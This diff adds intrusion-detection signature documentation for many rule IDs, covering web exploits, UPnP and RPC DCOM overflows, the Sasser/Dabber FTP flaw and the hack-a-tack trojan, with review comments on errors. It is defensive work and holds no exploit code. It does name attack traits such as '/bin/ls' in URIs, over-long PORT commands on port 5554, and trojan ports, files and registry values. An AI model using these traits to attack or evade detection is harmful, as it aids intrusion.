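Review bot: the content is the generic web-server text ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion") with an empty Additional References section; it does not identify the request or application sid 1391 matches, so "False Positives: None known." cannot be checked and tuning is impossible. Add the specific file or parameter to Detailed Information and a reference. "attackers choosing" should be "attacker's choosing"; "Web server" and "web server" are both used.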
--- /dev/null
+++ b/doc/signatures/1110.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1110
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
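Review bot: 1110.txt is identical to 1391.txt apart from the Sid line, so it inherits the same problem: nothing in the file says which request or application sid 1110 matches, and Additional References is empty, which leaves "False Positives: None known." unverifiable. Each sid should document its own pattern and cite a reference rather than share this generic text. "attackers choosing" should be "attacker's choosing".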
--- /dev/null
+++ b/doc/signatures/1384.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1384
+
+--
+Summary:
+This event is generated when a remote user attempts to send a NOTIFY directive to an internal host's Universal Plug and Play (UPnP) server.
+
+--
+Impact:
+Attempted administrator access or denial of service.  A successful attack may cause a denial of service or permit the execution of arbitrary code with administrator privileges.
+
+--
+Detailed Information:
+The UPnP is used to find network-based devices.  Specifically, UPnP NOTIFY directives are employed to advertise the existence of UPnP devices on the network.  A vulnerability exists that permits a malformed NOTIFY directive to cause a buffer overflow on the remote host listening on UPnP.  Alternately, a malformed NOTIFY directive may be used to exhaust resources on a remote host listening on UPnP.  The buffer overflow attack may permit the execution of arbitrary code on the host with administrator privileges.
+
+--
+
+Affected Systems:
+Microsoft Windows 98, 98SE, ME, XP
+
+--
+Attack Scenarios:
+An attacker may obtain craft a malformed NOTIFY directive to cause a denial of service or attempt to execute arbitrary code on the victim host.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+This event will be generated if external hosts are permitted to query for UPnP devices.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound UPnP traffic.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0876
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0877
+
+--
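Review bot: Attack Scenarios "An attacker may obtain craft a malformed NOTIFY directive" has a stray "obtain"; "The UPnP is used to find network-based devices" should be "UPnP is used". Corrective Action "Block inbound UPnP traffic" would be more actionable if the file named the port and transport the NOTIFY directive arrives on, which it currently does not. There is an extra blank line between "--" and Affected Systems.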
--- /dev/null
+++ b/doc/signatures/1730.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1730
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
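Review bot: Affected Systems is empty; either fill it or write "Any web or FTP server that does not validate requested paths" to match Detailed Information. Summary is generic ("a directory traversal attack") while Attack Scenarios is FTP-specific ("browse folders outside the ftp root directory"); state which protocol and which traversal pattern sid 1730 matches, because the "None known" False Positives entry depends on whether that pattern can appear in legitimate client requests. Additional References is empty, and "Apply the appropriate vendor supplied patches" lacks a period.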
--- /dev/null
+++ b/doc/signatures/516.txt
@@ -0,0 +1,61 @@
+Nigel - added new references to the rule and bumped up revision number.
+Rule:
+
+--
+Sid:
+516
+
+--
+Summary:
+This event is generated when an attempt is made by Simple Network Management Protocol (SNMP) to enumerate Server Message Block (SMB) users on the host.
+
+--
+Impact:
+Reconnaissance.  An attacker may obtain SMB usernames of the remote host. 
+
+--
+Detailed Information:
+Server Message Block is a network file sharing protocol used between Windows hosts and Unix and between Windows hosts that communicate via Samba.  SNMP can be used to query a remote host that listens for SNMP requests and supports SMB, to list the SMB usernames.  This provides reconnaissance of valid usernames and may be followed by a brute force attack to guess passwords.
+
+--
+Affected Systems:
+Hosts that run SMB and listen for SNMP requests.
+
+--
+Attack Scenarios:
+An attacker may obtain a list of current usernames on the remote host as a precursor of attempting a brute force attack to guess passwords of those users.
+
+--
+Ease of Attack:
+A Nessus script exists to list current SMB users.
+
+--
+False Positives:
+None.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound SNMP traffic.
+
+Disable SNMP as a listening service on the remote host unless it is required.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS333
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10546
+
+--
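Review bot: the first line of this hunk, "Nigel - added new references to the rule and bumped up revision number.", is an editing note to a colleague rather than documentation and sits before the "Rule:" header; it should be dropped from the shipped file. The rest of the entry is consistent with itself (the Nessus plugin and arachNIDS references back the "A Nessus script exists" line under Ease of Attack).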
--- /dev/null
+++ b/doc/signatures/1059.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1059
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
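Review bot: the Summary and Detailed Information in this hunk are generic web-server boilerplate (the same text reappears verbatim for SIDs 1830 and 1098 later in this patch) and never say what request SID 1059 actually matches, while the only reference is an SQL injection whitepaper, so the reader cannot tell whether the rule is about SQL injection or something else; name the URI, script or application the rule looks for. The reference URL "www.nextgenss.com/papers/advanced_sql_injection.pdf" also lacks the "http://" scheme that every other reference in this patch carries. Minor: "attackers choosing" should be "attacker's choosing" (this recurs in several files).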
--- /dev/null
+++ b/doc/signatures/2093.txt
@@ -0,0 +1,86 @@
+Rule:
+
+--
+Sid:
+2093
+
+--
+Summary:
+vulnerability in xdrmem_getbytes used by XDR in RPC portmap services.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdrmem_getbytes) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request can lead to remote system compromise and
+super user access to the target host. Additionally, a denial of service 
+and execution of arbitrary code with the privilege of the super user is 
+also possible.
+
+--
+Affected Systems:
+Multiple vendors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request to the target
+host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7123
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0028
+
+CERT:
+http://www.cert.org/advisories/CA-2003-10.html
+http://www.kb.cert.org/vuls/id/516825
+http://www.kb.cert.org/vuls/id/192995
+
+--
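Review bot: the Summary line "vulnerability in xdrmem_getbytes used by XDR in RPC portmap services." is a sentence fragment; the leading "This event is generated when an attempt is made to exploit a known" used by the other entries appears to have been lost. Also "rpc request" is written in lower case twice (Detailed Information and Attack Scenarios) while the rest of the file uses "RPC". The references (Bugtraq 7123, CAN-2003-0028, CERT CA-2003-10) match the xdrmem_getbytes issue described, which is more than most entries in this patch provide.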
--- /dev/null
+++ b/doc/signatures/100000110.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000110
+
+-- 
+Summary: 
+This event is generated when the Dabber virus attempts to exploit a 
+vulnerability in the FTP server installed by the Sasser virus.
+
+-- 
+
+Impact: 
+If the Sasser virus is currently running on the affected system, then the 
+Dabber virus will be able to install itself as well.
+
+--
+Detailed Information:
+Some variants of the Sasser virus install an FTP server that listens on port 
+5554. However, this FTP server suffers from a buffer overflow in the PORT 
+command, which can be exploited with a command of 100 or more characters. The 
+Dabber virus makes use of this vulnerability as an infection vetor.
+
+--
+Affected Systems:
+Any machine with a variant of the Sasser virus whose FTP server listens on port 
+5554. 
+
+--
+
+Attack Scenarios: 
+A known virus scans the Internet in search of vulnerable systems.
+
+-- 
+
+Ease of Attack: 
+Simple, as the virus is in the wild.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Users should employ a virus removal tool to clean their system of both Dabber 
+and Sasser, and then apply the latest security patches from Microsoft to 
+prevent further infections.
+
+--
+Contributors: 
+Matt Watchinski <mwatchinski@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
+
+--
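Review bot: typo "vetor" for "vector" in the last line of Detailed Information. The separator layout in this hunk also deviates from the other files: several "--" lines carry trailing spaces and are followed by an empty line before the next heading (before Impact, Attack Scenarios, Ease of Attack and Corrective Action), which anything that splits these files on a "--" line directly followed by a heading will trip over. The trigger itself is stated precisely (PORT command of 100 or more characters against the port 5554 FTP server), which is good; the False Positives section could add that no legitimate FTP service is expected on that port.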
--- /dev/null
+++ b/doc/signatures/3330.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3330
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
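Review bot: the Attack Scenarios paragraph ("a request for a file with an overly long filename via a network share") does not match the Detailed Information above it, which describes malformed data sent to an RPC port; one of the two was copied from another entry and the pair should be reconciled. Typo "Expoit" under Ease of Attack. Additional References is empty although the Microsoft RPC DCOM flaw has a vendor bulletin and a CVE entry that should be cited here. The same text, with the same problems, is repeated for SID 3416 later in this patch.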
--- /dev/null
+++ b/doc/signatures/1610.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1610
+
+--
+Summary:
+An attempt to access a script (formmail) in the cgi-bin which has known
+vulnerabilities.
+
+Formmail is a freely available perl script that is used to send data
+collected via a form to specified addresses.
+
+--
+Impact:
+Attempt to gain information about the web-server environment variables.
+Could also be an attempt to execute commands on the web-server that will
+execute with the privilege of the user owning the daemon running the
+server. The script may also be used to relay SPAM or to disclose the
+contents of files on the host.
+
+--
+Detailed Information:
+This could be an attempt to gain intelligence about the web-server that
+might be used to further exploit the machine. The environment variables
+of the web-server might be retrieved and sent via email to an address of
+the attackers choosing. More importantly this could be an attempt to
+execute commands on the web-server. Should this be successful, the
+commands would execute with the privileges of the user owning the httpd daemon.
+
+--
+Attack Scenarios:
+Formmail receives information from a form via an HTTP POST. This
+includes the email addresses to which the form data is sent. A URI in
+the form of a POST to the formmail script could be crafted to send
+environment variables to a specified email address.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Web-servers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. The web-server httpd
+daemon should be run as a non-privileged user without login access to
+the host. The formmail script should be updated to a non-vulnerable
+version as soon as possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
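Review bot: the Affected Systems section is missing from this file entirely (Detailed Information is followed directly by Attack Scenarios), which breaks the section layout every other entry follows; add it, naming the formmail script and the vulnerable versions if known, otherwise the generic "All systems running the formmail script". Also "outside of it's designated web root" should be "its", and Additional References is empty although the Summary speaks of "known vulnerabilities".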
--- /dev/null
+++ b/doc/signatures/1830.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1830
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
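Review bot: everything from Summary through Corrective Action in this hunk is identical to the SID 1059 entry earlier in this patch, so the file says nothing that distinguishes SID 1830 (which URI, script or application it matches); at least the Summary should name it, and Additional References should not be empty when the rule targets a "known vulnerability". Minor: "attackers choosing" should be "attacker's choosing".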
--- /dev/null
+++ b/doc/signatures/1446.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1446
+
+--
+Summary:
+This event is generated when an external attacker uses the "vrfy root"
+command to find the login name or mail alias of the system
+administrator. This may also indicate a vulnerability scan.
+
+--
+Impact:
+Information gathering. 
+
+--
+Detailed Information:
+An attacker may be able to obtain the email alias or actual email
+address of root users. This allows the attacker to know which email
+accounts may be more valuable to target, and can be used by spammers or
+as targets for denial of service attempts.
+
+--
+Affected Systems:
+Systems running Sendmail.
+
+--
+Attack Scenarios:
+An attacker uses vrfy root to obtain the name of administrators on the
+server. The attacker now knows which accounts have administrative
+access, and may use this information to focus later attacks.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the vrfy command on your mail server, or update your Sendmail
+configuration file so that Sendmail displays non-sensitive information
+when it receives a vrfy root request.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RFC 821:
+http://www.faqs.org/rfcs/rfc821.html
+
+Security Space:
+http://www.securityspace.com/smysecure/catid.html?viewsrc=1&id=10249
+
+--
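Review bot: Affected Systems says "Systems running Sendmail." but the VRFY command described here is part of SMTP itself (the cited RFC 821), so any mail server that answers VRFY is affected; either widen Affected Systems to SMTP servers with VRFY enabled or explain in Detailed Information why the rule is specific to Sendmail. The Corrective Action text is likewise Sendmail-only and could add the generic advice of disabling VRFY on whatever MTA is in use.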
--- /dev/null
+++ b/doc/signatures/718.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+718
+
+--
+Summary:
+This event is generated when an attempted telnet login fails from a remote user.
+
+--
+Impact:
+Attempted remote access.  This event may indicate that an attacker is attempting to guess username and password combinations.  Alternately, it may indicate that an authorized user has entered an incorrect username and password combination.
+
+--
+Detailed Information:
+A telnet server will issue an error message after a failed login attempt.  This may be an indication of an attacker attempting brute force guessing of username and password combinations.  It is also possible that an authorized user has incorrectly entered a legitimate username and password combination.  Telnet traffic is passed in clear text so it is not recommended for remote connections.  Secure Shell is considered to be a more secure alternative.
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed telnet login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule writer Max Vision <vision@whitehats.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS127
+
+--
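Review bot: the False Positives text ("This event may be triggered by a failed telnet login attempt from a remote user.") restates the rule's trigger condition rather than describing a false positive; the Impact section already has the right wording ("an authorized user has entered an incorrect username and password combination"), so reuse that here. Minor: missing space in "Steven Alexander<alexander.s@mccd.edu>" under Contributors.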
--- /dev/null
+++ b/doc/signatures/1368.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1368
+
+--
+Summary:
+Attempted ps command access via web
+
+--
+Impact:
+Attempt to gain information on system files and filestructure
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the filesystem on a webserver. The ls command lists the files and filesystem layout on a UNIX or Linux based system. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ls'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. 
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1369
+
+--
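Review bot: the Summary says this is an attempted "ps command access via web" but Detailed Information and Attack Scenarios describe the ls command and the string '/bin/ls' in the URI, and the only reference is "sid: 1369", so the body looks copied from the ls entry; either the Summary or the body is wrong for SID 1368 and the file should describe a single command consistently. Also: missing space in "'/bin/ls'in the URI", "it's designated web root" should be "its", and the Affected Systems section is missing.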
--- /dev/null
+++ b/doc/signatures/1098.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1098
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
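Review bot: this file is a verbatim copy of the SID 1059 and 1830 entries (same Summary, Impact, Detailed Information and Corrective Action) with an empty Additional References section, so it carries no information specific to SID 1098; add at least what request the rule matches and a reference for the vulnerability it covers.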
--- /dev/null
+++ b/doc/signatures/141.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+141
+
+--
+Summary:
+hack-a-tack is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files and reboot the targeted machine.
+
+--
+Detailed Information:
+The Trojan changes system registry settings to add the hack-a-tack server to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	141	HackAttack 1.20 Connect
+	614	hack-a-tack attempt
+
+This Trojan is commonly used to install other Trojan programs.
+
+The server portion opens TCP ports 31785 and 31787 and UDP ports 31789 and 31791 by default to establish a connection between client and server. The ports may then be configured by the attacker to use something other than these defaults.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Expl32.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Explorer32 ="<drive>:\windows\Expl32.exe"
+	Configuration Wizard = "<drive>:\windows=cfgwiz32.exe"
+
+Removal of this entry is required.
+
+Delete the file(s) <drive>:\WINDOWS\Expl32.exe and <drive>:\windows=cfgwiz32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS314
+http://www.whitehats.com/info/IDS504
+
+Hackfix.org
+http://www.hackfix.org/miscfix/hackatack.shtml
+
+Commodon Communications
+http://www.commodon.com/threat/threat-hack.htm
+
+--
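Review bot: under Corrective Action the path "<drive>:\windows=cfgwiz32.exe" (both in the "Configuration Wizard" registry value and in the "Delete the file(s)" line) uses "=" where a "\" path separator is expected; compare "<drive>:\windows\Expl32.exe" on the line above and fix it to "<drive>:\windows\cfgwiz32.exe". Also, "Affected registry keys" lists only the Run key and the two items under "Registry keys added" are values beneath that key, so call them values and make "Removal of this entry is required." plural to match. The server location given under Ease of Attack ("<drive>:\WINDOWS\Expl32.exe") belongs in Detailed Information next to the port list rather than in a section about attack difficulty.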
--- /dev/null
+++ b/doc/signatures/1776.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid: 1776
+
+-- 
+
+Summary: 
+This event is generated when an attempt is made to use the MySQL 'show' command to garner a list of databases.
+
+-- 
+Impact: 
+Intelligence gathering. This may be the prelude to an attack against one the databases or the MySQL daemon.
+
+--
+Detailed Information:
+This event is generated when the MySQL command 'show' is used to garner a list of MySQL databases being served by the MySQL daemon.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+A MySQL implementation may inappropriately respond to connections from any host external to the protected network. The atttacker may be able to query the daemon to gain a list of databases available, then continue to garner information from the databases.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a legitimate user making a query to a MySQL daemon from an external source.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
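Review bot: "Sid: 1776" is written on a single line here, whereas every other file in this patch puts the number on the line after "Sid:", which matters if anything parses these files by line. Typos: "atttacker" under Attack Scenarios and "one the databases" (missing "of") under Impact; the first Corrective Action sentence lacks a full stop. Detailed Information also says the connection "can either be a legitimate telnet connection", which for a MySQL 'show' query should read as a MySQL client connection, telnet being only one way to reach the port.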
--- /dev/null
+++ b/doc/signatures/3416.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3416
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
